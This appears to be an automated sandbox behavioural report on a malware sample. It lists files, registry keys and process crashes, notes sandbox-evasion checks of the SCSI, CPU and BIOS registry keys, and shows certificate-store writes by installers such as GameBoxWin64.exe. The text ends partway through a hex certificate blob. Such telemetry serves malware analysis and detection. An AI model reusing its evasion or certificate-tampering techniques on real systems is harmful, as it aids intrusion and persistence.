msiexec.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Installer\f74eb31.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF351.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID57.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\SystemTemp\~DFDF8AC9F3942F7FFD.TMP msiexec.exe File created C:\Windows\Installer\f74eb31.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF227.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF4E8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAE5.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF51048722BFEFC2F8.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF022.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E0.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF6FFB5CFF992020C3.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF07ECE270F696013C.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSIF73B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFAC6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13EF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2584.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBB3E.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1832 1096 WerFault.exe rundll32.exe 1492 4504 WerFault.exe Info.exe 6092 5288 WerFault.exe S9vvbu_thmJNivbyrd5cbgjY.exe 508 5276 WerFault.exe 1JXoSiUoBQDRFxKQt6PfAJQT.exe 5272 5556 WerFault.exe KaN6V1t36aPvGbjwrCNT4frv.exe 1556 5340 WerFault.exe ZP8ROxtPgq7xzmkTnY1ILt2W.exe 4280 5592 WerFault.exe bXB9E3wOjLBBoAzWOKy1jhXH.exe 4780 5192 WerFault.exe S5JNKYGQ09fmPKqgYZFlX5Wl.exe 5180 2000 WerFault.exe rundll32.exe 5984 4408 WerFault.exe rundll32.exe 5348 1884 WerFault.exe askinstall53.exe 6148 7084 WerFault.exe anyname.exe 5792 7084 WerFault.exe anyname.exe 5512 7084 WerFault.exe anyname.exe 5724 3128 WerFault.exe A126.exe 4196 5452 WerFault.exe explorer.exe 4196 1400 WerFault.exe 8421129.exe 5544 4780 WerFault.exe 1478644.exe 6676 5344 WerFault.exe 4881157.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
bEYG8MCmwS_N0mgL9uYFs3Jb.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bEYG8MCmwS_N0mgL9uYFs3Jb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bEYG8MCmwS_N0mgL9uYFs3Jb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bEYG8MCmwS_N0mgL9uYFs3Jb.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsiexec.execmd.exeWerFault.exe1478644.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 1478644.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Enumerates system info in registry 2 TTPs 40 IoCs
Processes:
WerFault.exeWerFault.exemsedge.execmd.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe1478644.exemsiexec.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 1478644.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 1478644.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msiexec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3784 taskkill.exe 3340 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
sihclient.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe -
Modifies registry class 7 IoCs
Processes:
Weather.exeWeather.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{EBB086E9-9B02-4D4F-902E-D03FD4258FF5} Weather.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{CC4DB119-78C5-4B85-8330-08CDB3243364} Weather.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ -
Processes:
GameBoxWin64.exeCleaner Installation.exeWeather Installation.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f